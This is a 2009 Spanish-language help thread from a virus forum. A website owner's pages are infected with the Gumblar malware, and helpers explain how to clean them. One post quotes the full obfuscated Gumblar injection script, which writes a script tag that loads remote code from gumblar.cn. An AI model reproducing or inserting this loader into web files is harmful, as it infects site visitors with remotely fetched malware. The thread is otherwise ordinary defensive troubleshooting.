Virus, Host y Dominio

[julianarmando]

Miren compañeros el antivirus y el el google chrome me pillan el virus que se llama "gumblar.cn" lo baje del servidor lo puse en el escritorio de mi pc y le e pasado mil antivirus y mil antispiware y nada me ayudan?

[julibaga]

Te pasa en todas las páginas que visitas o sólo te pasa en una en concreto??

Lo digo porque normalmente, ese virus, es porque la página que visitas está infectada.

En cualquier caso, bájate las siguientes utilidades:

[url=http://www.zonavirus.com/descargas/elistara.asp]Elistara[/url]

[url=http://www.zonavirus.com/descargas/elitriip.asp]Elitriip[/url]

Las ejecutas de una en una y cuando terminen abres el archivo [b]c:\infosat.txt[/b], copias el contenido y lo pegas en tu siguiente post para ver los resultados y nos comentas si quedaron solucionados los problemas.

Y para ver los procesos bájate el [url=http://www.zonavirus.com/descargas/sproces.asp]SProcess[/url] (herramienta de investigación) y lo ejecutas. Tras pulsar en SALIR, postea el contenido del [b]c:\sproclog.txt[/b] con un copiar y pegar.

[julianarmando]

no mira es ke esa pagina es mia. <interceptado> y algunas personas que entran a la pagina me dice ke les sale ese virus :(

[julibaga]

ok. Pues el tema es que la tienes infectada.

Te paso información que encontré al respecto:

El archivo infectado tiene un Script algo parecido a este [code](function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);[/code]
Parece que lo más recomendable es eliminar los .js, .html e index.php y volver a subirlos de una copia limpia.



Hasta el momento, Karpesky puede eliminar este tipo de virus pero no se ha encontrado una solucion para los sitios webs infectados mas que eliminar todo y volver a cargar todo el sitio web. Es importante tener un backup de la pagina web o portal ante la posible amenaza.



Fuente: trescirculos y google.

[julianarmando]

si borro los .js los .html y los .php pailas :s porque tengo respaldos pero de despues de que se infecto todo eso :S sera ke si busko esa linea de codigo y la borro se me kita eso?

[julibaga]

Pruébalo. Pero haz copia antes.

[julianarmando]

bueno gracias :D

[msc hotline sat]

Buscando informacion al respecto del gumblar.cn, parece que existe un fichero que es parte integrante: sys32dll.exe , mira si lo encuentras y nos lo envias para analizar:





[b]¿Como enviar las muestras a zonavirus? - Para ello recordar[/b]:

https://foros.zonavirus.com/viewtopic.php?f=5&t=14253







Tras recibirlos, los analizaremos e implementaremos su control y eliminacion, si procede, en nuestras utilidades, de lo cual informaremos



saludos



ms, 12-5-2009

[julianarmando]

listo hay ke desinfectar la computadora cambiar las claver y luego a mano desinfectar los archivos.. no se pega en muchos. en WP se pega en los index principales. y en los themes tambien en los .js es facil reconozerlo porque agrega un codigo en la primera linea del archivo antes de <php

[julibaga]

Pues no iba mal encaminado.

En fin, me alegro que lo solucionaras. Ahora acuérdate de hacer copias más a menudo... :D

[msc hotline sat]

Pero otra vez, envianos los ficheros que se te pidan ! Sino de nada nos sirve al foro.



Y dando por solucionado el Tema, procedemos a cerrarlo



saludos



ms, 18-5-2009

ref CO/BOG+4.6-74.08